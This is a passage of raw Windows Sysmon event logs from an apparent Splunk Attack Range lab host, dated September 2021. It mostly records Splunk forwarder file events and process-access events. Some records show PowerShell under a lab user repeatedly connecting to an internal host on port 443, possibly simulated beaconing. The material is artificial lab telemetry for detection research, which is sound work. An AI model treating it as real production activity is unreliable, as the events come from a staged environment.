AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0E2C28CA6543E9D96AA6C199E61CBC5,SHA256=4081AA4B328285626B164CDD25FF8193A3EE3D98351CE02848AA700F097E8B5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:58.104{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DBBFEF8F938B758C051585F70E03AFA,SHA256=D0644A3D16400CBC3EF56510CC69F79A00BA43A1D0A5E1F347F9913E9962E9BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:59.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3B80825DB216CC7B24D227556468BBF6,SHA256=6FF54087268FCEC1A2EE141ADFAAB25FB99FD0F2415BEFD162AABB826B7885E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:59.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=103F5FBF87A0EC00D5086C20B27168EE,SHA256=2A03B6DDF11DBC8B03EA763551821EA9DDC16EA8ED6B4CECF7EC2BCF9859053B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:00.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D18ED8533F69CF9153BAEA96EF4BF1F,SHA256=0732D50135EB64DE99520DBA7AD4619291711D2AD7DF62651CCD18A7EBE1961E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:30.007{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50524-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:01.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36016D747D362B1325EEB0B3E81D1AC8,SHA256=815D1C3B9B9722063E1E40565A8D64C58D5F2EE02B6FF082463F6CA34D1B8794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:02.220{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD493E58C0C506F94F19A1E3CBFBA96D,SHA256=7632CDE0532AE00B9BFB0229EA472DAE142C0B3FA9649C9831926E7063C6861B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:03.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=590BD08DB00EE8744B9541BFD74780E4,SHA256=78DAE76DAC4031567300DBE0DA56F6315868E889A57365973DCA71934F0E4F0B,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000036497342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:32.905{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50525-false10.0.1.12-8000- 23542300x800000000000000036497345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.435{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A9C8BC02F5DD471FF97966390A6AD867,SHA256=39065B3171B3754A42A3F9E108740D6BD208F7D878E13F5BF1B1CCE3747EBCB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6351C85D097195FE2B218861FF8272C,SHA256=DA9F24D2F7545F5D70D3DAADC458B5C55E53ACD43D040419540CF7736DBA4C04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:35.020{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50526-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:05.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=447B8A5D685F2978E159F4000947E46A,SHA256=C14919BF426472C06F161B8475111AB97F6C9F43CE6F69C6C3ECFFB005FCF740,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:06.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=900BA948AF60AF13E78BCFE3CD7E1E1D,SHA256=634F97EB8CB9037DF80F7E43BC354A15B1BB63835BA9269CF02DCC63F5C70D79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:07.931{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.931{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.917{B81B27B7-A0D3-6140-7F56-04000000C801}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036497350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:37.916{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50527-false10.0.1.12-8000- 23542300x800000000000000036497349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:07.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28CFADCDC9234A9DFACB5EA23249BBA,SHA256=7A0E92F3D7BB06393D335C62539058B01114CBDE2F0BCA38FE08DB5558902DAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000036497368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:08.630{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.630{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.616{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A0575635E1711C8C4050A1069442F3,SHA256=849ED4784F387D4B43C604C2215EB172FEFE71435D4961BE0154C804DF1D1488,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C27D0D36336E0C9D6AB1FCCD052631F4,SHA256=8A381DD8EF9E6C252997DA375204F4E999438B91DF5A9A4487992F3A414C009D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.078{B81B27B7-A0D3-6140-7F56-04000000C801}33803684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:09.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CCDAAD3FD0CCACF0FFF1B87CA1D4B90,SHA256=953AC96FAA687E6B263E55060914DCA14B42D66A70D2ABDE977347B76F75D6B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.047{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50528-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:09.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 